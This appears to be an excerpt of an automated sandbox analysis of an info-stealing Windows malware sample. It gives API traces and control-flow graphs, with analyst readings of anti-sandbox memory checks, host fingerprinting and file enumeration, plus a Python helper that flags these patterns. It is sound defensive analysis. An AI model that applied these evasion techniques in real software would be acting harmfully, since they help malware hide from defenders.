                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00420681
                          • lstrlen.KERNEL32(00FA6280), ref: 00420698
                          • lstrcpy.KERNEL32(00000000,?), ref: 004206C9
                          • lstrcat.KERNEL32(00000000,?), ref: 004206D5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00420706
                          • lstrcpy.KERNEL32(00000000,00FB8930), ref: 0042074B
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0042077F
                          • lstrcpy.KERNEL32(00000000,00FBDA38), ref: 004207E7
                          • lstrcpy.KERNEL32(00000000,00FB8A10), ref: 00420858
                          • lstrcpy.KERNEL32(00000000,fplugins), ref: 004208CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00420928
                          • lstrcpy.KERNEL32(00000000,00FB8B30), ref: 004209F8
                            • Part of subcall function 004024E0: lstrcpy.KERNEL32(00000000,?), ref: 00402528
                            • Part of subcall function 004024E0: lstrcpy.KERNEL32(00000000,?), ref: 0040254E
                            • Part of subcall function 004024E0: lstrcpy.KERNEL32(00000000,?), ref: 00402577
                          • lstrcpy.KERNEL32(00000000,00FB8AB0), ref: 00420ACE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00420B81
                          • lstrcpy.KERNEL32(00000000,00FB8AB0), ref: 00420D58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID: fplugins
                          • API String ID: 2500673778-38756186
                          • Opcode ID: 102da0547f015c8a6b6665157c5076d66cc89a4e5b28524f58839b2f620943f4
                          • Instruction ID: 2977f58bd565bc87d3027e3a4284b5b6abf89f5725de4680fc1820e78b50a913
                          • Opcode Fuzzy Hash: 102da0547f015c8a6b6665157c5076d66cc89a4e5b28524f58839b2f620943f4
                          • Instruction Fuzzy Hash: 5EE27C70A053418FD724DF29D588B6AB7E1BF88304F98846EE44D8B3A2DB79D841CF56
                          APIs
                          • lstrlen.KERNEL32(00FA6640), ref: 0041F315
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041F3A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F3C7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F47B
                          • lstrcpy.KERNEL32(00000000,00FA6640), ref: 0041F4BB
                          • lstrcpy.KERNEL32(00000000,00FB8910), ref: 0041F4EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F59E
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041F61C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041F64C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041F69A
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041F718
                          • lstrlen.KERNEL32(00FB8820), ref: 0041F746
                          • lstrcpy.KERNEL32(00000000,00FB8820), ref: 0041F771
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F793
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041F7E4
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041FA32
                          • lstrlen.KERNEL32(00FB8990), ref: 0041FA60
                          • lstrcpy.KERNEL32(00000000,00FB8990), ref: 0041FA8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041FAAD
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041FAFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 806779118f500e9edd6336fbe00a6e27762bcd0c698c7585eff1c0e9e23367b8
                          • Instruction ID: b1b3401ca7ed6073f6a1df52858564e1fd518ad7e6c307e5b2d44b517578f4c8
                          • Opcode Fuzzy Hash: 806779118f500e9edd6336fbe00a6e27762bcd0c698c7585eff1c0e9e23367b8
                          • Instruction Fuzzy Hash: 96F12D70A01202CFCB24DF69D948A96B7E5BF44314B18817ED8099B3A1D779DC87CF98

Control-flow Graph (the rendered graph and its executed/not-executed colouring are not preserved; the block structure below is recovered from the graph data)

• 418ca0-418cc4: StrCmpCA at entry; one branch goes to 418cc6-418cc7, which calls ExitProcess (the only string this function references is "block", see String ID below), the other to 418ccd-418ce6
• 418ccd-418ce6 → either the exit block 418ee2-418eef (call 402a20) or 418cec-418cf1 → loop head 418cf6-418cf9
• Loop head 418cf6-418cf9 → dispatcher 418cff (13 cases) or loop tail 418ec3-418edc; the tail goes back to the head via 418cf3 or out through 418ee2-418eef
• Nine dispatcher cases call StrCmpCA and rejoin the loop tail, directly or through a short block: 418d84-418d92 (→ 418d98-418d9f), 418da4-418db8, 418dbd-418dcb (→ 418dd1-418dd8), 418ddd-418deb (→ 418df1-418df8), 418dfd-418e0b (→ 418e11-418e18), 418e1d-418e2b (→ 418e31-418e38), 418e3d-418e4b (→ 418e4d-418e54), 418e56-418e64 (→ 418e66-418e6d), 418e6f-418e7d (→ 418e7f-418e86)
• Four dispatcher cases call lstrlen, then optionally 402a20 and always 402930, and join at 418eb3-418eb5: 418d06-418d15 (418d17-418d1c, 418d1f-418d2b), 418d30-418d3f (418d41-418d46, 418d49-418d55), 418d5a-418d69 (418d6b-418d70, 418d73-418d7f), 418e88-418e9a (418e9c-418ea1, 418ea4-418eb0)
• 418eb3-418eb5 → 418eb7-418eb9 → 418ebb-418ebd (lstrcpy); each of the three can also go straight to the loop tail
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 8983f2499ebbe81503e459e2129ac65020d433edc8972eb3e38289e769c8f2d0
                          • Instruction ID: e7fcc4a53534b60d15b00afbaab1e27a1efdad2741b636824d2c92ff7b56b57b
                          • Opcode Fuzzy Hash: 8983f2499ebbe81503e459e2129ac65020d433edc8972eb3e38289e769c8f2d0
                          • Instruction Fuzzy Hash: 2A518E70A047019FCB209F75DD88AAF7BF4BB54705B10682FE442D6650DBBCE9828F69

Control-flow Graph (the rendered graph and its executed/not-executed colouring are not preserved; the block structure below is recovered from the graph data)

• 422740-422783: GetWindowsDirectoryA; one branch runs the single-instruction block 422785 first, both continue at 42278c
• 42278c-4227ea: GetVolumeInformationA; in the API list below the volume-serial output pointer is the only non-NULL output argument, so only the serial is requested (strings referenced by this function: "C" and ":\")
• 4227ec-4227f2 / 4227f4-422807: a loop over the result
• 422809-422820: GetProcessHeap, RtlAllocateHeap (the 0x104-byte size is logged on the GetProcessHeap line because it is already on the stack); one successor skips to 422822-422824, the other, 422826-422844, runs wsprintfA
• 42285b-422872: call 4271e0 and return
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0042277B
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,004193B6,00000000,00000000,00000000,00000000), ref: 004227AC
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0042280F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00422816
                          • wsprintfA.USER32 ref: 0042283B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                          • String ID: :\$C
                          • API String ID: 2572753744-3309953409
                          • Opcode ID: ce0125ce13eb0816da93c0b4716b1f90aac9f737335d5e264dd372cef419b960
                          • Instruction ID: d93c7da38ddd29de155311ca5e1d1e4f781f7aaabd56b552648b56c95dd02ec1
                          • Opcode Fuzzy Hash: ce0125ce13eb0816da93c0b4716b1f90aac9f737335d5e264dd372cef419b960
                          • Instruction Fuzzy Hash: 4E3170B1908219AFCB04DFA89A859EFBFB8EF58740F10016EE505E7250E6748B408BA5

Control-flow Graph (the rendered graph and its executed/not-executed colouring are not preserved; the block structure below is recovered from the graph data)

• 404bc0-404bce → 404bd0-404bd5 (a block that loops on itself) → 404bd7-404c48: three operator new (??2@YAPAXI@Z) calls of 0x800 bytes each, lstrlen, InternetCrackUrlA, call 402a20
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00404BF7
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404C01
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404C0B
                          • lstrlen.KERNEL32(?,00000000,?), ref: 00404C1F
                          • InternetCrackUrlA.WININET(?,00000000), ref: 00404C27
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ??2@$CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1683549937-4251816714
                          • Opcode ID: 83350d63855a898580c196c4f361b3f244a8d67ec79f2e5ffb9c4633858592fb
                          • Instruction ID: 1bd60353331dbecd9a7383d9733d23d0053dd466cc4828cfdfd0774d9622719e
                          • Opcode Fuzzy Hash: 83350d63855a898580c196c4f361b3f244a8d67ec79f2e5ffb9c4633858592fb
                          • Instruction Fuzzy Hash: D8012D71D00218AFDB10DFA9EC45B9EBBB8EB48364F00412AF914E7390EB7459058FD4

                          Control-flow Graph (basic block: address range, API or helper calls → successor blocks)

                          • 2798: 401030-401055, GetCurrentProcess, VirtualAllocExNuma → 2799, 2800
                          • 2799: 401057-401058, ExitProcess
                          • 2800: 40105e-40107b, VirtualAlloc → 2801, 2802
                          • 2801: 401082-401088 → 2803, 2804
                          • 2802: 40107d-401080 → 2801
                          • 2803: 4010b1-4010b6
                          • 2804: 40108a-4010ab, VirtualFree → 2803
                          Reading: block 2798 calls VirtualAllocExNuma and branches either to ExitProcess (2799) or on to 2800, which commits a 0x17C841C0-byte region with VirtualAlloc; 2804 releases it with VirtualFree before the function returns through 2803. Terminating on a failed allocation is the usual shape of a memory-budget sandbox check, although the graph alone does not show which branch is the failure branch.
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00401046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 0040104D
                          • ExitProcess.KERNEL32 ref: 00401058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0040106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 004010AB
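                          The five calls above are the whole of the routine at 0x401030, and the constants in them carry the meaning: 0x3000 is MEM_COMMIT|MEM_RESERVE, 0x40 is PAGE_EXECUTE_READWRITE, 0x04 is PAGE_READWRITE, 0x8000 is MEM_RELEASE, and 0x17C841C0 is exactly 399,000,000 bytes (about 380 MiB), a hand-picked decimal size. A commit that large succeeds on a real workstation but fails on an analysis VM with a tight memory budget, and the ExitProcess that follows the allocation turns that failure into a silent exit. Two caveats when reading these lines: the 0x7D0/0x3000/0x40 values printed on the GetCurrentProcess line are stack contents at the call site (reading them as VirtualAllocExNuma's dwSize, allocation type and protection is an interpretation), and the VirtualFree line cannot be taken literally, since MEM_RELEASE requires dwSize to be 0 and lpAddress to be the region base. The Python below is an added triage helper, not code from the report or from the sample: it parses trace lines in the report's own layout, decodes the allocation constants, and flags the allocation-gated ExitProcess and the oversized commit. The sample input is the five lines above; the 256 MiB "oversized" threshold is an assumption, not a constant from the malware.

```python
import re

# Constructed sample input: the API-trace lines the report prints for the
# routine at 0x401030, in the report's own "api.MODULE(args), ref: addr" layout.
# Argument values are whatever the sandbox read from the stack at call time.
SAMPLE_TRACE = """\
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00401046
VirtualAllocExNuma.KERNEL32(00000000), ref: 0040104D
ExitProcess.KERNEL32 ref: 00401058
VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0040106C
VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 004010AB
"""

LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Bit flags for VirtualAlloc dwAllocationType / VirtualFree dwFreeType.
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE",
              0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
# flProtect is an enumeration rather than a bitmask, so it is looked up exactly.
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE"}

# Triage threshold for an "oversized" commit (assumption, not a Stealc constant).
LARGE_ALLOC_BYTES = 256 * 1024 * 1024


def parse_trace(text):
    """Return one dict per trace line: api, module, args (ints where hex), ref."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()  # tolerate the report's bullet glyph
        m = LINE_RE.match(line)
        if not m:
            continue
        args = []
        for a in (m.group("args") or "").split(","):
            a = a.strip()
            if not a:
                continue
            args.append(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else a)
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def decode_alloc_type(value):
    """Render a dwAllocationType/dwFreeType bitmask as MEM_* names."""
    names = [name for bit, name in ALLOC_TYPE.items() if value & bit]
    leftover = value & ~sum(ALLOC_TYPE)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"


def analyze(calls):
    """Flag the allocation-gated exit and the oversized commit in a trace."""
    findings = []
    apis = [c["api"] for c in calls]
    for i, c in enumerate(calls):
        # Pattern 1: an allocation whose next call (in address order) is
        # ExitProcess, i.e. the process quits when the allocation fails.
        if (c["api"] in ("VirtualAlloc", "VirtualAllocExNuma")
                and i + 1 < len(calls) and apis[i + 1] == "ExitProcess"):
            findings.append(f"{c['api']} at {c['ref']:08X} gates ExitProcess at "
                            f"{calls[i + 1]['ref']:08X}: allocation-failure evasion check")
        # Pattern 2: decode VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect).
        if c["api"] == "VirtualAlloc" and len(c["args"]) >= 4:
            size, atype, prot = c["args"][1:4]
            text = (f"VirtualAlloc at {c['ref']:08X}: size={size:#x} ({size:,} bytes, "
                    f"{size / 2**20:.1f} MiB), {decode_alloc_type(atype)}, "
                    f"{PAGE_PROT.get(prot, hex(prot))}")
            if size >= LARGE_ALLOC_BYTES:
                text += "; oversized commit, typical of a memory-budget sandbox probe"
            findings.append(text)
    return findings


def summarize(text=SAMPLE_TRACE):
    return analyze(parse_trace(text))


if __name__ == "__main__":
    for finding in summarize():
        print(finding)
```

                          The adjacency heuristic in pattern 1 relies on the report listing calls in address order, which is why ExitProcess at 00401058 appears between the two allocations; the control-flow graph above confirms that edge (2798 → 2799). When feeding other functions' traces into the helper, check the graph the same way before trusting the pairing.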
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
                          • Instruction ID: aa33e4c314b55322e5f005f032d3d73aad5dab283e8b13059c6bb542b9569755
                          • Opcode Fuzzy Hash: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
                          • Instruction Fuzzy Hash: 5E0144713403047BE7240A656C1AF6B77AEA781B01F209029F744F33D0DAB1EA008AB8

                          Control-flow Graph (basic block: address range, API or helper calls → successor blocks)

                          • 2805: 41ee90-41eeb5, call 402930 → 2808, 2809
                          • 2808: 41eeb7-41eebf → 2809, 2810
                          • 2809: 41eec9-41eecd, call 406c40 → 2812
                          • 2810: 41eec1-41eec3, lstrcpy → 2809
                          • 2812: 41eed2-41eee8, StrCmpCA → 2813, 2814
                          • 2813: 41ef11-41ef18, call 402a20 → 2820
                          • 2814: 41eeea-41ef02, call 402a20, call 402930 → 2823, 2824
                          • 2820: 41ef20-41ef28 → 2820 (loop), 2822
                          • 2822: 41ef2a-41ef37, call 402930 → 2823, 2831
                          • 2823: 41ef45-41efa0, call 402a20 (10 times)
                          • 2824: 41ef04-41ef0c → 2823, 2827
                          • 2827: 41ef0e-41ef0f → 2830
                          • 2830: 41ef3e-41ef3f, lstrcpy → 2823
                          • 2831: 41ef39 → 2830
                          Reading: the value produced by the 402930/406c40 helpers is compared against the literal "ERROR" with StrCmpCA (2812); both arms converge on 2823, which calls 402a20 ten times, and the path through 2827/2831 writes "ERROR" into the output buffer with lstrcpy (2830) first. The helper addresses are internal to the sample and the report does not name their purpose.
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041EEC3
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041EEDE
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041EF3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: ERROR
                          • API String ID: 3722407311-2861137601
                          • Opcode ID: ce871ecde8db7cfc3056d6aeb74e55e33849ac66478390f3a1a41166bfceedc7
                          • Instruction ID: c28ac5a7a25757f932124dc7d3da9c4eb04f0c6587e56c0f8f9bd0407561c574
                          • Opcode Fuzzy Hash: ce871ecde8db7cfc3056d6aeb74e55e33849ac66478390f3a1a41166bfceedc7
                          • Instruction Fuzzy Hash: 662103747202065BCB21FF7ADD4969B37A4AF14304F04543EBC4AEB2D2DE78E8558B98

                          Control-flow Graph (basic block: address range, API calls → successor blocks)

                          • 2886: 4010c0-4010cb → 2887
                          • 2887: 4010d0-4010dc → 2889
                          • 2889: 4010de-4010f3, GlobalMemoryStatusEx → 2890, 2891
                          • 2890: 401112-401114, ExitProcess
                          • 2891: 4010f5-401106 → 2892, 2893
                          • 2892: 401108 → 2890, 2894
                          • 2893: 40111a-40111d
                          • 2894: 40110a-401110 → 2890, 2893
                          Reading: 2889 calls GlobalMemoryStatusEx; one outcome goes straight to ExitProcess (2890), the other into the comparison chain 2891/2892/2894, every step of which can also reach ExitProcess, so 2893 is the only block that returns. This is a memory-threshold check that terminates the process on hosts whose reported memory looks like an analysis VM; the report does not show which MEMORYSTATUSEX field is compared or against what value.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @ (the byte 0x40 = 64, i.e. sizeof(MEMORYSTATUSEX), the dwLength value that must be stored before calling GlobalMemoryStatusEx; the report renders the immediate as the character '@')
                          • API String ID: 803317263-2766056989
                          • Opcode ID: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
                          • Instruction ID: 822a68ba0681b22967503a2222785f0e102d58cfae2bd9798b899adfc8918474
                          • Opcode Fuzzy Hash: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
                          • Instruction Fuzzy Hash: A8F027701082444BEB186A64DD4A32EF7D9EB46350F10493BEEDAE72E2E278C840857F

                          Control-flow Graph (basic block: address range, API or helper calls → successor blocks)

                          • 2895: 418c88-418cc4, StrCmpCA → 2898, 2899
                          • 2898: 418cc6-418cc7, ExitProcess
                          • 2899: 418ccd-418ce6 → 2901, 2902
                          • 2901: 418ee2-418eef, call 402a20
                          • 2902: 418cec-418cf1 → 2903
                          • 2903: 418cf6-418cf9 → 2905, 2906
                          • 2905: 418ec3-418edc → 2901, 2944
                          • 2906: 418cff (13-way dispatch) → 2908, 2909, 2910, 2911, 2912, 2913, 2914, 2915, 2916, 2917, 2918, 2919, 2920
                          • 2908: 418d84-418d92, StrCmpCA → 2905, 2928
                          • 2909: 418da4-418db8, StrCmpCA → 2905
                          • 2910: 418d06-418d15, lstrlen → 2933, 2934
                          • 2911: 418e88-418e9a, lstrlen → 2921, 2922
                          • 2912: 418e6f-418e7d, StrCmpCA → 2905, 2937
                          • 2913: 418d30-418d3f, lstrlen → 2923, 2924
                          • 2914: 418e56-418e64, StrCmpCA → 2905, 2936
                          • 2915: 418d5a-418d69, lstrlen → 2925, 2926
                          • 2916: 418dbd-418dcb, StrCmpCA → 2905, 2929
                          • 2917: 418ddd-418deb, StrCmpCA → 2905, 2930
                          • 2918: 418dfd-418e0b, StrCmpCA → 2905, 2931
                          • 2919: 418e1d-418e2b, StrCmpCA → 2905, 2932
                          • 2920: 418e3d-418e4b, StrCmpCA → 2905, 2935
                          • 2921: 418ea4-418eb0, call 402930 → 2955
                          • 2922: 418e9c-418ea1, call 402a20 → 2921
                          • 2923: 418d41-418d46, call 402a20 → 2924
                          • 2924: 418d49-418d55, call 402930 → 2955
                          • 2925: 418d73-418d7f, call 402930 → 2955
                          • 2926: 418d6b-418d70, call 402a20 → 2925
                          • 2928: 418d98-418d9f → 2905
                          • 2929: 418dd1-418dd8 → 2905
                          • 2930: 418df1-418df8 → 2905
                          • 2931: 418e11-418e18 → 2905
                          • 2932: 418e31-418e38 → 2905
                          • 2933: 418d17-418d1c, call 402a20 → 2934
                          • 2934: 418d1f-418d2b, call 402930 → 2955
                          • 2935: 418e4d-418e54 → 2905
                          • 2936: 418e66-418e6d → 2905
                          • 2937: 418e7f-418e86 → 2905
                          • 2944: 418cf3 → 2903
                          • 2955: 418eb3-418eb5 → 2905, 2956
                          • 2956: 418eb7-418eb9 → 2905, 2957
                          • 2957: 418ebb-418ebd, lstrcpy → 2905
                          Reading: 2895 compares a string with StrCmpCA and one outcome is an immediate ExitProcess (2898); the only string the report attributes to this function is "block", so a response or field equal to "block" is the likely trigger. The loop 2903 → 2906 → ... → 2905 → 2944 → 2903 then walks a sequence of items, and 2906 dispatches each through a 13-case table where every case is either a StrCmpCA against a constant or an lstrlen followed by the 402a20/402930 helpers; the lstrlen cases converge in 2955 and can end in a final lstrcpy (2957). The loop exits through 2905 → 2901.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 199727815f74bd6f548b200098013af7923e8b2be706878c7c6ca2245bdf0acd
                          • Instruction ID: cf156cc369858262e2dadb611c66b3ae29e6092b46f6725d5e09786bedaf1566
                          • Opcode Fuzzy Hash: 199727815f74bd6f548b200098013af7923e8b2be706878c7c6ca2245bdf0acd
                          • Instruction Fuzzy Hash: 75E0D860500245F7D7049BB9CC89D86BB6CAF94714B04802DF5048B211DB65EC03C7A8

                          Control-flow Graph (basic block: address range, API calls → successor blocks)

                          • 2958: 422ad0-422b22, GetProcessHeap, RtlAllocateHeap, GetComputerNameA → 2959, 2960
                          • 2959: 422b44-422b59
                          • 2960: 422b24-422b36
                          Reading: a single block allocates 0x104 (260, i.e. MAX_PATH) bytes from the process heap and fills it with GetComputerNameA; 2959 and 2960 are the two continuations on the call's result, and the graph does not say which is the success path. The host name collected here is the kind of value the sample's other string comparisons can be run against.
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00422AFF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00422B06
                          • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422B1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 0be16655d1dcf82a79328a1c088b057431a11f06d39f8fcbc5b2efcdb50dc0fe
                          • Instruction ID: 161a44a7ca907f82e4f91189bba25393484f2c5b0b651073a0db56667aea58a7
                          • Opcode Fuzzy Hash: 0be16655d1dcf82a79328a1c088b057431a11f06d39f8fcbc5b2efcdb50dc0fe
                          • Instruction Fuzzy Hash: 45018F72A44618ABC714CF99AD45B9AB7A8F744B21F00026AE915D2780D7B819008AA5
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004123D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004123F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00412402
                          • lstrlen.KERNEL32(\*.*), ref: 0041240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00412436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00412486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 77def00054b922a86f955edf876f6a5a3c710cb0914003e28737d80166cab566
                          • Instruction ID: b0db976fdef61ef6b5df8073a0384315e56344567102d4c60de99346afafca47
                          • Opcode Fuzzy Hash: 77def00054b922a86f955edf876f6a5a3c710cb0914003e28737d80166cab566
                          • Instruction Fuzzy Hash: 44A27571A112169FCB21AF75DE88ADF77B9AF04304F04502AB805E7391DBB8DD458FA8
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004016E2
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00401719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040176C
                          • lstrcat.KERNEL32(00000000), ref: 00401776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004017A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004017EF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004017F9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401825
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401875
                          • lstrcat.KERNEL32(00000000), ref: 0040187F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004018AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 004018F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004018FE
                          • lstrlen.KERNEL32(00431794), ref: 00401909
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401929
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401935
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040195B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401966
                          • lstrlen.KERNEL32(\*.*), ref: 00401971
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040198E
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0040199A
                            • Part of subcall function 00424040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0042406D (CSIDL 0x1C is CSIDL_LOCAL_APPDATA, the %LOCALAPPDATA% directory)
                            • Part of subcall function 00424040: lstrcpy.KERNEL32(00000000,?), ref: 004240A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004019C3
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401A0E
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401A16
                          • lstrlen.KERNEL32(00431794), ref: 00401A21
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401A41
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00401A4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401A76
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00401A81
                          • lstrlen.KERNEL32(00431794), ref: 00401A8C
